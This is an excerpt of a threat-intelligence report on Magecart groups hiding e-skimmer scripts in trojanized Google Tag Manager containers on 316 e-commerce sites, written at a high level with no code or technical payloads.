Magecart Groups Abuse Google Tag Manager
Editor’s Note: The following post is an excerpt of a full report by Gemini Advisory. To read the entire analysis, click here to view the full report.
Gemini analysts have observed 316 e-commerce sites infected by Magecart attacks that deploy trojanized Google Tag Manager (GTM) containers since February 4, 2021. These attacks fall under two variants: one that embeds the malicious e-skimmer script in the container and another that uses the container to download the actual e-skimmer script from a separate dual-use domain. Most of the victims for both variants were US-based sites and used the Magento e-commerce platform. Analysis of the two variants suggest that distinct Magecart groups are responsible for each variant.
The shift to e-commerce due to the COVID-19 pandemic has increased interest in CNP e-skimming activity. As the level of activity increases, so too does the level of effort to mask activity from automated scanners and security researchers. The use of a legitimate service offers an excellent opportunity to hide malicious scripts and thus maintain a foothold on victimized e-commerce sites.
Editor’s Note: This post was an excerpt of a full report by Gemini Advisory. To read the entire analysis, click here to view the full report.